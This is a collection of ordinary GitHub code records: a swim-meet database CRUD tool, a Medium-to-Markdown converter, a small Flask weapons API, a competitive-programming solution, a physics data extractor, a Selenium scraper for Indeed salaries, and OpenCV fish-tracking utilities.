field to omit it.\")\n for r in rows:\n print (r[0])\n\n selection=input()\n #arg_list=selection.split(\",\")\n vals=selection[:-1].split(\",\");\n vals=[x for x in vals if x]\n vals.insert(0, table_name )\n callInsert(table_name, vals)\n #callInsert(table_name, arg_list)\n\ndef UpdateRowMenu(conn_str):\n valid_names =[\"Org\", \"Participant\", \"Event\"]\n selection= input(\"What Table Do You Want to Update\\n(Org, Participant, Event)\\n\")\n #make sure the name is valid\n if(valid_names.count(selection)>0):\n name_not_valid=False\n table_name=selection\n UpdateRow(table_name, conn_str)\n else:\n print (\"Table not valid:\")\n\ndef UpdateRow(table_name, conn_str):\n #get the available tables from the database\n # Connect to an existing database\n # Connect to an existing database\n try:\n conn=psycopg2.connect(conn_str)\n except:\n print(\"I am unable to connect to the database\")\n return;\n querry=\"SELECT reminder FROM RemindPrimaryKey WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n rows = cur.fetchall()\n # Make the changes to the database persistent\n conn.commit()\n #should only be 1 row, but I'm itterating to get at it.\n print(\"Enter primary key:\")\n for r in rows:\n print (r[0])\n selection=input()\n #now ask for values to update\n querry=\"SELECT reminder FROM RemindNotPK WHERE tablename='\"+ table_name+\"'\"\n #querry=\"SELECT reminder FROM Remind WHERE tablename='\"+ table_name+\"'\"\n cur = conn.cursor()\n cur.execute(querry)\n rows = cur.fetchall()\n # Make the changes to the database persistent\n conn.commit()\n\n print(\"Enter a Field_Name='New_Value' . Separate multiple Fields by commas. Valid fields:\")\n for r in rows:\n print (r[0])\n selection=input()\n arg_list=selection.split(\", \")\n print(\"arg list:\", arg_list)\n #callInsert(table_name, arg_list)\n # Close communication with the database\n cur.close()\n conn.close()\n\ndef OutputTable(conn_str):\n '''Output the specified table as .csv'''\n # Connect to an existing database\n tableList =['Org', \"Meet\", \"Participant\", \"Leg\", \"Stroke\", \"Distance\", \"Event\", \"StrokeOf\", \"Heat\", \"Swim\"]\n\n# selection= input(\"What Tables Do You Want to Output? Please list all of them and seperate each table by ',' without space. \\n(Org, Meet, Participant, Event, Stroke, Distance, Heat, Swim, Leg, StrokeOf)\\n\")\n# tableList = selection.split(',')\n outputTableDList = []\n fileName= input(\"What is the name for file (without .csv)\")\n# outputPath = \"output/output.csv\"\n\n \n try:\n conn = psycopg2.connect(conn_str)\n print(\"Opened database successfully\")\n except:\n print(\"I am unable to connect to the database\")\n \n # Open a cursor to perform database operations\n cur = conn.cursor()\n \n for tblName in tableList:\n if tblName == 'Org':\n cur.callproc('OutputOrg')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Meet':\n cur.callproc('OutputMeet')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Participant':\n cur.callproc('OutputParticipant')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Event':\n cur.callproc('OutputEvent')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Stroke':\n cur.callproc('OutputStroke')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Distance':\n cur.callproc('OutputDistance')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Heat':\n cur.callproc('OutputHeat')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Swim':\n cur.callproc('OutputSwim')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'Leg':\n cur.callproc('OutputLeg')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n \n if tblName == 'StrokeOf':\n cur.callproc('OutputStrokeOf')\n rows = cur.fetchall()\n outputTableDList.append(rows)\n # Make the changes to the database persistent\n conn.commit()\n \n # Close communication with the database\n cur.close()\n conn.close()\n \n try:\n with open(fileName + '.csv', 'w') as fp:\n for tblNameIdx, tblData in enumerate(outputTableDList):\n fp.write(\"*%s\\n\"%tableList[tblNameIdx])\n size = len(tblData[0])\n formatStr = \",\".join(['%s' for i in range(size)])\n fp.write('\\n'.join(formatStr % tuple([y if not isinstance(y, bool) else int(y) for y in x]) for x in tblData))\n fp.write('\\n')\n except:\n with open(fileName + '.csv', 'w') as fp:\n fp.write(\"\")\n print(\"Empty query, output an empty .csv file\")\n \n","repo_name":"Zhenshan-Jin/Swimming_Championships_Database","sub_path":"CRUD.py","file_name":"CRUD.py","file_ext":"py","file_size_in_byte":12643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39467385384","text":"# coding: utf8\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom tag_mapper import TagMapper\n\n\nclass MediumToMarkdown:\n def __init__(self, post_url):\n self.post_url = post_url\n\n def transform(self):\n responses = self.medium_post()\n fname = '-'.join(responses.url.split('/')[-1].split('-')[:-1])\n\n markdown_file = open(f\"{fname}.md\", \"w+\", encoding=\"utf8\")\n for section in responses:\n for tag in section:\n # skip author infomation\n if tag.name == 'div' and 'uiScale-caption--regular' in tag[\"class\"]:\n continue\n markdown_tag = TagMapper(tag).to_markdown()\n if markdown_tag:\n markdown_file.write(markdown_tag)\n markdown_file.write(\"\\n\\n\")\n\n markdown_file.close()\n\n def medium_post(self):\n post_content = self.medium_post_response().content\n soup = BeautifulSoup(post_content, 'html.parser')\n return soup.find_all(\"div\", {\"class\": \"sectionLayout--insetColumn\"})\n\n def medium_post_response(self):\n return get(self.post_url, stream=True)\n","repo_name":"imteekay/m2m","sub_path":"m2m/medium_to_markdown.py","file_name":"medium_to_markdown.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"52"} +{"seq_id":"39798145101","text":"from flask import Flask, request, jsonify\nimport psycopg2\n\napp = Flask(__name__)\n\nconn = psycopg2.connect(\"dbname='items' host='localhost'\")\ncursor = conn.cursor()\n\n@app.route('/weapon/add', methods=(['POST']))\ndef add_weapon():\n form = request.form\n name = form.get('name')\n if name =='':\n return jsonify(\"Name is required!\"), 400\n type = form.get('type')\n if type =='':\n return jsonify(\"Type is required!\"), 400\n damage = form.get('damage')\n size = form.get('size')\n rating = form.get('rating', '5')\n if rating.isnumeric():\n rating = int(rating)\n else:\n return jsonify('Rating must be numeric'), 400\n \n cursor.execute(\"INSERT INTO weapons (name, type, damage, size, rating) VALUES(%s,%s,%s,%s,%s)\",(name, type, damage, size, rating))\n conn.commit()\n return jsonify('Weapon added'), 200\n\n@app.route('/weapon/edit/', methods=(['POST']))\ndef edit_weapon(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n results = cursor.execute('SELECT id FROM weapons WHERE id = %s', [weapon_id])\n results= cursor.fetchone()\n if results == None:\n return jsonify('No weapon found, please try again.'), 404\n form = request.form\n name = form.get('name')\n if name =='':\n return jsonify(\"Name is required!\"), 400\n type = form.get('type')\n if type =='':\n return jsonify(\"Type is required!\"), 400\n damage = form.get('damage')\n size = form.get('size')\n rating = form.get('rating', '5')\n if rating.isnumeric():\n rating = int(rating)\n else:\n return jsonify('Rating must be numeric'), 400\n \n cursor.execute(\"UPDATE weapons SET (name, type, damage, size, rating) = (%s,%s,%s,%s,%s) WHERE id = %s\",(name, type, damage, size, rating, weapon_id))\n conn.commit()\n return jsonify('Weapon edited'), 200\n\n# @app.route('/weapon/', methods=(['GET']))\n# def get_weapon_by_name(weapon_name):\n# results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons WHERE LOWER(name) LIKE %s', [f'%{weapon_name.lower()}%'])\n# results= cursor.fetchone()\n# if results == None:\n# return jsonify('No weapon found, please try again.'), 404\n# results_dictionary = {\n# 'id' : results[0],\n# 'name' : results[1],\n# 'type' : results[2],\n# 'damage' : results[3],\n# 'size' : results[4],\n# 'rating' : results[5]\n# }\n# return jsonify(results_dictionary),200\n\n@app.route('/weapon/', methods=(['GET']))\ndef get_weapon_by_name(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons WHERE id = %s', [weapon_id])\n results= cursor.fetchone()\n if results == None:\n return jsonify('No weapon found, please try again.'), 404\n results_dictionary = {\n 'id' : results[0],\n 'name' : results[1],\n 'type' : results[2],\n 'damage' : results[3],\n 'size' : results[4],\n 'rating' : results[5]\n }\n return jsonify(results_dictionary),200\n\n@app.route('/weapon/delete/', methods=(['DELETE']))\ndef delete_weapon_by_id(weapon_id):\n if weapon_id.isnumeric():\n weapon_id = int(weapon_id)\n else:\n return jsonify('ID must be numeric'), 400\n result = cursor.execute('SELECT name, id FROM weapons WHERE id = %s', [weapon_id])\n result= cursor.fetchone()\n if result == None:\n return jsonify('No weapon found, please try again.'), 404\n cursor.execute('DELETE from weapons WHERE id = %s', [weapon_id])\n conn.commit()\n return jsonify(f'Weapon ({result[0]}, ID#{result[1]}) deleted'), 200\n\n\n@app.route('/weapons/list', methods=(['GET']))\ndef get_all_weapons():\n results = cursor.execute('SELECT id, name, type, damage, size, rating FROM weapons')\n results = cursor.fetchall()\n list_of_weapons = []\n\n for x in results:\n list_of_weapons.append({\n 'id' : x[0],\n 'name' : x[1],\n 'type' : x[2],\n 'damage' : x[3],\n 'size' : x[4],\n 'rating' : x[5]\n })\n \n \n return jsonify({'weapons' : list_of_weapons}),200\n\nif __name__ == \"__main__\":\n app.run()\n\n# CREATE TABLE IF NOT EXISTS Weapons (\n# id serial PRIMARY KEY,\n# Name VARCHAR NOT NULL,\n# Type VARCHAR NOT NULL,\n# Damage VARCHAR,\n# Size VARCHAR,\n# Rating INT DEFAULT 5\n# );","repo_name":"BadArce/beginner-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26532262061","text":"n, m, d = map(int, input().split())\nplanks = list(map(int, input().split()))\n\nonRight = n + 1\ntotal = sum(planks)\n\ncur = 0\n\ndata = [0 for i in range(n + 2)]\n\nfor j, plank in enumerate(planks):\n\n dist = onRight - total + d if total + d > onRight else d\n\n if dist < 0:\n break\n\n print(cur + dist)\n cur += dist\n\n \n for i in range(plank):\n data[cur + i] = j + 1\n\n cur += plank - 1\n \n onRight = n - cur\n total -= plank\nelse:\n print(\"YES\")\n print(\" \".join(map(str, data[1:-1])))\n quit()\nprint(\"NO\")\n \n","repo_name":"cormackikkert/competitive-programming","sub_path":"CodeForces/Round 598/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31605166367","text":"import Utilities as U\n\n\ndef extractAUXData(inputAUXData_Lines):\n '''Given AUX data lines of 36 bits each, this function extracts hit coordinates for tracks and\n returns in the form of a list with (sectorID, 11 hit coordinates).'''\n\n # extracted values\n coordinates = []\n sectorIDs = []\n nTracks = 0\n\n # control and header words\n headerCount = -1\n readingDataWords = False\n trackWordCount = -1\n trackCoordinates = []\n\n # read through each line of the file\n for lineNumber, line in enumerate(inputAUXData_Lines, start=1):\n\n if headerCount >= 0 and headerCount <= 6:\n headerCount += 1\n if headerCount == 7:\n readingDataWords = True\n\n if U.regSlice(line, 31, 16) == '1110000011011010': # e0da\n readingDataWords = False\n AUXData = zip(sectorIDs, coordinates)\n yield AUXData # return one event\n sectorIDs = []\n coordinates = []\n\n if U.regSlice(line, 31, 16) == '1011000011110000': # b0f0\n headerCount = 0\n\n if U.regSlice(line, 31, 16) == '1110000011110000': # e0f0\n headerCount = -1\n\n if readingDataWords:\n\n trackWordCount += 1\n\n if U.regSlice(line, 31, 31) == '1': # begin track\n # sectorID = U.regSlice(line, 12, 0) + '00'\n sectorID = U.regSlice(line, 15, 0)\n sectorIDs.append(int(sectorID, 2))\n nTracks += 1\n trackWordCount = 0\n trackCoordinates = []\n\n if trackWordCount >= 2 and trackWordCount <= 4: # pixel hit clusters\n columnCoord = U.regSlice(line, 27, 16)\n rowCoord = U.regSlice(line, 11, 0)\n trackCoordinates.append(rowCoord)\n trackCoordinates.append(columnCoord)\n\n if trackWordCount >= 5 and trackWordCount <= 9: # SCT hit clusters\n hit1Coord = U.regSlice(line, 10, 0)\n trackCoordinates.append(hit1Coord)\n\n if trackWordCount == 9: # end of track\n trackCoordinates = [U.binToInt(num) for num in trackCoordinates]\n coordinates.append(trackCoordinates) # 11 coordinates total - first 6 are pixels (row, col), and last 5 are SCT\n","repo_name":"MattUnderscoreZhang/EXTFPythonScript","sub_path":"AUXDataExtraction.py","file_name":"AUXDataExtraction.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11108022641","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport csv\nimport re\nimport io\nimport pandas as pd\n\n# Windows users need to specify the path to chrome driver you just downloaded.\n# You need to unzip the zipfile first and move the .exe file to any folder you want.\ndriver = webdriver.Chrome(r'C:\\Users\\Murugesan\\Desktop\\DataScience Projects\\Webscrap\\Indeed_selenium\\chromedriver.exe')\n# driver = webdriver.Chrome()\n\n# Click job button to go to the job section\n# Windows users need to open the file using 'wb'\n# csv_file = open('jobs.csv', 'wb')\n\ncsv_file = io.open('Data-Analyst-SalariesWI.csv', 'w', encoding=\"utf-8\", newline='')\nwriter = csv.writer(csv_file)\nwriter.writerow(['title', 'Avg_salary', 'State'])\n# Page index used to keep track of where we are.\n\nstatelist = ['California', 'Florida', 'Georgia', 'Illinois', 'Indiana', 'Maryland', 'Massachusetts','Michigan', 'Minnesota', 'New-Jersey', 'New-York-State', 'North-Carolina', 'Ohio','Pennsylvania', 'Texas', 'Virginia','Washington-State', 'Wisconsin']\n\ntemplate_url = \"https://www.indeed.com/salaries/Data-Analyst-Salaries,-\"\n\ncsv_file = io.open('Data-Analyst-Salaries_US_cities.csv', 'w', encoding=\"utf-8\", newline='')\n\nfor i in statelist:\n\turl = template_url + i\n\tprint (url) \n\tdriver.implicitly_wait(10) \n\tdriver.get(url)\n\n\tindex = 1\n\t#while index <10: # this is to check if the coding works wiht few pages \n\twhile True:\n\t\ttry:\n\t\t\tprint(\"Scraping Page number \" + str(index))\n\t\t\tindex = index + 1\n\t\t\t# Find all the jobs on the page\n\t\t\twait_job = WebDriverWait(driver, 10)\n\t\t\tjoblist = wait_job.until(EC.presence_of_all_elements_located((By.XPATH,\n\t\t\t\t\t\t\t\t\t\t'//tr[@data-tn-component=\"salary-entry[]\"]')))\n\t\t\tprint(\"joblist length = \" + str(len(joblist)))\n\t\t\tfor job in joblist:\n\n\t\t\t\t# Initialize an empty dictionary for each job\n\t\t\t\tjob_dict = {}\n\t\t\t\t# Use relative xpath to locate the title, text, username, date.\n\t\t\t\t# Once you locate the element, you can use 'element.text' to return its string.\n\t\t\t\t# To get the attribute instead of the text of each element, use 'element.get_attribute()'\n\t\t\t\ttitle = job.find_element_by_xpath('.//div[@class=\"cmp-sal-title\"]').text \n\t\t\t\tprint(\"title = \" + title)\n\t\t\t\t\n\t\t\t\tAvg_salary = job.find_element_by_xpath('.//div[@class=\"cmp-sal-summary\"]').text\n\t\t\t\tprint(\"Avg_salary = \" + Avg_salary)\n\n\t\t\t\t\n\t\t\t\tjob_dict['title'] = title\n\t\t\t\tjob_dict['Avg_salary'] = Avg_salary\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\twriter.writerow(job_dict.values())\n\n\n\t\t\twait_button = WebDriverWait(driver, 10)\n\t\t\tnext_button = wait_button.until(EC.element_to_be_clickable((By.XPATH,\n\t\t\t\t\t\t\t\t\t\t'//a[@data-tn-element=\"next-page\"]')))\n\t\t\tprint(\"next_button_found\")\n\t\t\tnext_button.click()\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tcsv_file.close()\n\t\t\tdriver.close()\n\t\t\tbreak\n","repo_name":"muruent/Indeedscrap","sub_path":"indeed_salaryscrape_cities.py","file_name":"indeed_salaryscrape_cities.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12203772616","text":"import cv2\nimport numpy as np\nimport random\n\nimport shapely.geometry\nimport shapely.affinity\nfrom shapely.geometry import Polygon\n\nimport DataProcessing\n\n\ndef two_shape_intersect( shape1, shape1_type, shape2, shape2_type):\n mode = ''\n if shape1_type == 'Rect':\n rect1 = shape1\n mode += 'r'\n if shape2_type == 'Rect':\n rect2 = shape2\n mode += 'r'\n elif shape2_type == 'Circle':\n circle1 = shape2\n mode += 'c'\n elif shape1_type == 'Circle':\n circle1 = shape1\n mode += 'c'\n if shape2_type == 'Rect':\n rect1 = shape2\n mode += 'r'\n elif shape2_type == 'Circle':\n circle2 = shape2\n mode += 'c'\n mode =''.join(sorted(mode))\n\n if mode == 'rr':\n p1 = Polygon(rect1)\n p2 = Polygon(rect2)\n intersect = p1.intersects(p2)\n \n return intersect\n\n\ndef mhis_intersect( frame, motions, no_cmp_mot, scale_rate, boundary): \n frame_height, frame_width = frame.shape[:2]\n b_minx, b_miny = boundary[0][0], boundary[0][1]\n b_maxx, b_maxy = boundary[1][0], boundary[1][1]\n region_list = []\n for i in range( 0, len(no_cmp_mot), 1):\n bool_intersect = False\n for j in range( 0, len(no_cmp_mot), 1):\n if i < j :\n temp_list = [no_cmp_mot[i],no_cmp_mot[j]]\n motion_box = []\n for k in range( 0, len(temp_list), 1):\n mot_id = temp_list[k]\n mot_x, mot_y = motions[mot_id][\"X\"], motions[mot_id][\"Y\"]\n mot_w, mot_h = motions[mot_id][\"Width\"], motions[mot_id][\"Height\"]\n p1_x = max(min( mot_x-scale_rate*mot_w, b_maxx), b_minx)\n p1_y = max(min( mot_y-scale_rate*mot_h, b_maxy), b_miny)\n p2_x = max(min( mot_x+(1+scale_rate)*mot_w, b_maxx), b_minx)\n p2_y = max(min( mot_y+(1+scale_rate)*mot_h, b_maxy), b_miny)\n pbox = [[p1_x,p1_y],[p1_x,p2_y],[p2_x,p2_y],[p2_x,p1_y]]\n motion_box.append(pbox)\n\n intersect = two_shape_intersect( motion_box[0], 'Rect', motion_box[1], 'Rect')\n if intersect == True:\n region_list.append(( no_cmp_mot[i], no_cmp_mot[j]))\n if bool_intersect == False:\n bool_intersect = True\n\n if bool_intersect == False:\n region_list.append(( no_cmp_mot[i], no_cmp_mot[i]))\n \n \n res_list = []\n for i in range( 0, len(region_list), 1):\n id1 = region_list[i][0]\n id2 = region_list[i][1]\n bool1, index1 = DataProcessing.find_in_list( res_list, id1)\n bool2, index2 = DataProcessing.find_in_list( res_list, id2)\n if bool1 == True and bool2 == True: \n if index1 != index2:\n group1 = res_list[index1]\n group2 = res_list[index2]\n res_list.append(group1+group2)\n res_list.remove(group1)\n res_list.remove(group2)\n\n elif bool1 == True and bool2 == False: \n temp = res_list[index1]+(id2,)\n res_list[index1] = temp\n elif bool1 == False and bool2 == True: \n temp = res_list[index2]+(id1,)\n res_list[index2] = temp\n elif bool1 == False and bool2 == False: \n temp = region_list[i]\n res_list.append(temp)\n\n for i in range( 0, len(res_list), 1):\n res_list[i] = sorted(list(set(res_list[i])))\n\n roi_box_list = [] \n for i in range( 0, len(res_list), 1): \n res_sublist = res_list[i]\n minx, miny = 0, 0\n maxx, maxy = 0, 0\n for j in range( 0, len(res_sublist), 1):\n res_index = res_sublist[j]\n x, y, w, h = motions[res_index][\"X\"], motions[res_index][\"Y\"], motions[res_index][\"Width\"], motions[res_index][\"Height\"]\n p1_x = int(max(min( x-scale_rate*w, b_maxx), b_minx))\n p1_y = int(max(min( y-scale_rate*h, b_maxy), b_miny))\n p2_x = int(max(min( x+(1+scale_rate)*w , b_maxx), b_minx))\n p2_y = int(max(min( y+(1+scale_rate)*h , b_maxy), b_miny))\n if j == 0:\n minx = p1_x\n miny = p1_y\n maxx = p2_x\n maxy = p2_y\n elif j > 0:\n minx = min( p1_x, minx)\n miny = min( p1_y, miny)\n maxx = max( p2_x, maxx)\n maxy = max( p2_y, maxy)\n\n roi_box_list.append(((minx,miny),(maxx,maxy)))\n\n uni_roi_box_list = []\n bool_intersect = False\n bool_no_intersect = True\n for i in range( 0, len(roi_box_list), 1): \n for j in range( 0, len(roi_box_list), 1): \n if i < j:\n box1_x1, box1_y1 = roi_box_list[i][0][0], roi_box_list[i][0][1]\n box1_x2, box1_y2 = roi_box_list[i][1][0], roi_box_list[i][1][1]\n box2_x1, box2_y1 = roi_box_list[j][0][0], roi_box_list[j][0][1]\n box2_x2, box2_y2 = roi_box_list[j][1][0], roi_box_list[j][1][1] \n\n box1 = [[box1_x1,box1_y1],[box1_x1,box1_y2],[box1_x2,box1_y2],[box1_x2,box1_y1]]\n box2 = [[box2_x1,box2_y1],[box2_x1,box2_y2],[box2_x2,box2_y2],[box2_x2,box2_y1]]\n intersect = two_shape_intersect( box1, 'Rect', box2, 'Rect')\n if intersect == True:\n bool_intersect = True\n bool_no_intersect = False\n bool1, index1 = DataProcessing.find_in_list( uni_roi_box_list, i)\n bool2, index2 = DataProcessing.find_in_list( uni_roi_box_list, j)\n if bool1 == True and bool2 == True: \n if index1 != index2:\n group1 = uni_roi_box_list[index1]\n group2 = uni_roi_box_list[index2]\n uni_roi_box_list.append(group1+group2)\n uni_roi_box_list.remove(group1)\n uni_roi_box_list.remove(group2)\n\n elif bool1 == True and bool2 == False:\n temp = uni_roi_box_list[index1]+(j,)\n uni_roi_box_list[index1] = temp\n\n elif bool1 == False and bool2 == True:\n temp = uni_roi_box_list[index2]+(i,)\n uni_roi_box_list[index2] = temp\n\n elif bool1 == False and bool2 == False: \n temp = (i,j)\n uni_roi_box_list.append(temp)\n \n if bool_no_intersect == True:\n uni_roi_box_list.append((i,i)) \n\n elif bool_no_intersect == False:\n bool_no_intersect == True\n \n if bool_intersect == True: \n temp_roi_box_list = []\n temp_res_list = []\n for i in range( 0, len(uni_roi_box_list), 1):\n temp_res = []\n for j in range( 0, len(uni_roi_box_list[i]), 1):\n temp_index = uni_roi_box_list[i][j]\n temp_res = temp_res + res_list[temp_index]\n if j == 0:\n minx, miny = roi_box_list[temp_index][0][0],roi_box_list[temp_index][0][1]\n maxx, maxy = roi_box_list[temp_index][1][0],roi_box_list[temp_index][1][1]\n elif j > 0:\n minx = min( minx, roi_box_list[temp_index][0][0])\n miny = min( miny, roi_box_list[temp_index][0][1])\n maxx = max( maxx, roi_box_list[temp_index][1][0])\n maxy = max( maxy, roi_box_list[temp_index][1][1])\n temp_res = list(set(temp_res))\n temp_res.sort()\n\n temp_roi_box_list.append([(minx,miny),(maxx,maxy)])\n temp_res_list.append(temp_res)\n\n res_list = temp_res_list\n roi_box_list = temp_roi_box_list\n\n return res_list, roi_box_list\n\n\ndef two_contourIntersect( original_image, contour1, contour2):\n contours = [contour1, contour2]\n\n blank = np.zeros(original_image.shape[0:2])\n\n image1 = cv2.drawContours(blank.copy(), contours, 0, 1)\n image2 = cv2.drawContours(blank.copy(), contours, 1, 1)\n\n intersection = np.logical_and(image1, image2)\n\n return intersection.any()\n\n\ndef two_contourIntersect_area( original_image, contour1, contour2):\n contours = [contour1, contour2]\n\n blank = np.zeros(original_image.shape[0:2])\n\n image1 = cv2.drawContours(blank.copy(), contours, 0, 1, -1)\n image2 = cv2.drawContours(blank.copy(), contours, 1, 1, -1)\n\n intersection = image1 + image2\n\n image1_area = np.sum(image1 == 1)\n image2_area = np.sum(image2 == 1)\n intersection_area = np.sum( intersection == 2)\n\n return intersection.any(), intersection_area\n\n\n\ndef filter_contour_bgr( cnt1_bgr, cnt2_bgr):\n BGRDiff_Limit = 25\n bool_color = True \n if abs(cnt1_bgr[1]-cnt2_bgr[1]) > BGRDiff_Limit:\n bool_color = False\n\n if abs(cnt1_bgr[2]-cnt2_bgr[2]) > BGRDiff_Limit:\n bool_color = False \n\n return bool_color\n\n\ndef fishid_color_create( fishcolor_dict, fish_dict):\n pixel_deep = 170 \n fishdict_keys = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n while color_b <= 30 and color_g <= 30 and color_r <= 235: \n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n\n color = ( color_b, color_g, color_r)\n fishid = fishdict_keys[i]\n fishcolor_dict[fishid] = color\n\n return fishcolor_dict\n\ndef fishid_color_update( fishcolor_dict, fish_dict): \n pixel_deep = 170 \n fishcolor_keys = list(fishcolor_dict.keys())\n fishdict_keys = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n fish_id = fishdict_keys[i]\n if fish_id in fishcolor_keys:\n pass\n elif fish_id not in fishcolor_keys:\n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n while color_b <= 30 and color_g <= 30 and color_r <= 235: \n color_b = random.randint(pixel_deep,255)\n color_g = random.randint(pixel_deep,255)\n color_r = random.randint(pixel_deep,255)\n color = ( color_b, color_g, color_r)\n fishcolor_dict[fish_id] = color\n\n return fishcolor_dict\n\n\ndef create_fishid_cntid( fish_dict, frame_index):\n fishid_cnt = {}\n cntid_fish = {}\n fishid_list = list(fish_dict.keys())\n for i in range( 0, len(fish_dict), 1):\n fishid = fishid_list[i]\n cnt_id = fish_dict[fishid][\"FrameIndex\"+str(frame_index-1)][\"NextContourID\"]\n fishid_cnt[fishid] = cnt_id\n if cnt_id not in list(cntid_fish.keys()):\n cntid_fish[cnt_id] = [fishid]\n else:\n cntid_fish[cnt_id].append(fishid)\n\n\n return fishid_cnt, cntid_fish\n\n\ndef transfer_cntid_fishid( unionid_list, cntid_fish):\n unionfishid_list = []\n for i in range( 0, len(unionid_list), 1):\n cntid_list = unionid_list[i][0]\n nextcntid_list = unionid_list[i][1]\n fishid_list = []\n for j in range( 0, len(cntid_list), 1):\n cntid = cntid_list[j]\n if cntid in list(cntid_fish.keys()): \n fishids = cntid_fish[cntid]\n else:\n continue\n fishid_list = fishid_list + fishids\n\n fishid_list = list(set(fishid_list)) \n fishid_list.sort() \n\n unionfishid_list.extend([[ fishid_list, nextcntid_list]])\n\n return unionfishid_list\n\n\ndef id_union( compare_dict):\n unionlist = []\n cntid_keys = list(compare_dict.keys())\n for i in range( 0, len(cntid_keys), 1):\n cnt_id = cntid_keys[i]\n nextcnt_ids = compare_dict[cnt_id]\n index_list = []\n for j in range( 0, len(unionlist), 1):\n unionlist_nextcnts = unionlist[j][1]\n bool_in = set(nextcnt_ids) & set(unionlist_nextcnts)\n if bool_in :\n index_list.append(j)\n if len(index_list) == 0:\n unionlist.extend([[ [cnt_id],nextcnt_ids ]])\n elif len(index_list) > 0:\n new_cntids = []\n new_nextcntids = []\n for j in range( len(index_list)-1, -1, -1):\n index = index_list[j]\n new_cntids = new_cntids + unionlist[index][0]\n new_nextcntids = new_nextcntids + unionlist[index][1]\n unionlist.pop(index)\n new_cntids = new_cntids + [cnt_id]\n new_nextcntids = new_nextcntids + nextcnt_ids\n unionlist.extend([[ new_cntids,new_nextcntids ]])\n \n for i in range( 0, len(unionlist), 1):\n unionlist[i][0] = list(set(unionlist[i][0]))\n unionlist[i][1] = list(set(unionlist[i][1])) \n\n return unionlist\n\n\ndef compute_roi_cntrect( frame, cnt, multiple, boundary):\n x, y, w, h = cv2.boundingRect(cnt)\n b_minx, b_miny = boundary[0][0], boundary[0][1]\n b_maxx, b_maxy = boundary[1][0], boundary[1][1]\n\n minx = int(max( x-multiple*w, b_minx))\n miny = int(max( y-multiple*h, b_miny))\n maxx = int(min( x+(1+multiple)*w, b_maxx)) \n maxy = int(min( y+(1+multiple)*h, b_maxy))\n\n roi_coordinate = {'minx': minx, 'miny': miny, 'maxx': maxx, 'maxy': maxy}\n roi_frame = frame[miny:maxy, minx:maxx]\n \n return roi_frame, roi_coordinate\n\n\ndef contour_coordinate_transform( contours, minx, miny):\n for i in range( 0, len(contours), 1):\n contours[i][:] += [int(minx),int(miny)] \n \n return contours\n\n\ndef fishid_union( unionfishid_list):\n unionlist = []\n for i in range( 0, len(unionfishid_list), 1):\n fish_ids = unionfishid_list[i][0]\n nextcnt_ids = unionfishid_list[i][1]\n\n cont = 0\n new_list = [[],[]]\n for j in range( 0, len(unionlist), 1):\n unionlist_detail = unionlist[j-cont]\n \n bool_in = set(nextcnt_ids) & set(unionlist_detail[1])\n if bool_in:\n new_list[0] = new_list[0] + unionlist_detail[0]\n new_list[1] = new_list[1] + unionlist_detail[1]\n unionlist.remove(unionlist_detail)\n cont = cont + 1\n new_list[0] = new_list[0] + fish_ids\n new_list[1] = new_list[1] + nextcnt_ids\n unionlist.append(new_list)\n\n for i in range( 0, len(unionlist), 1):\n unionlist[i][0] = list(set(unionlist[i][0]))\n unionlist[i][1] = list(set(unionlist[i][1]))\n\n unionlist[i][0].sort()\n unionlist[i][1].sort()\n\n return unionlist\n\n\ndef color_limit( old_p, new_p, grow_limit):\n diff_p = abs(old_p - new_p)\n grow_p = diff_p * grow_limit * 0.01\n min_p = int(max(0, old_p - grow_p))\n max_p = int(min(254, old_p + grow_p))\n new_p = max( min_p, new_p)\n new_p = min( max_p, new_p)\n\n return new_p\n\n","repo_name":"NTNUNSL/Fish-Motion-Tracking","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":15113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 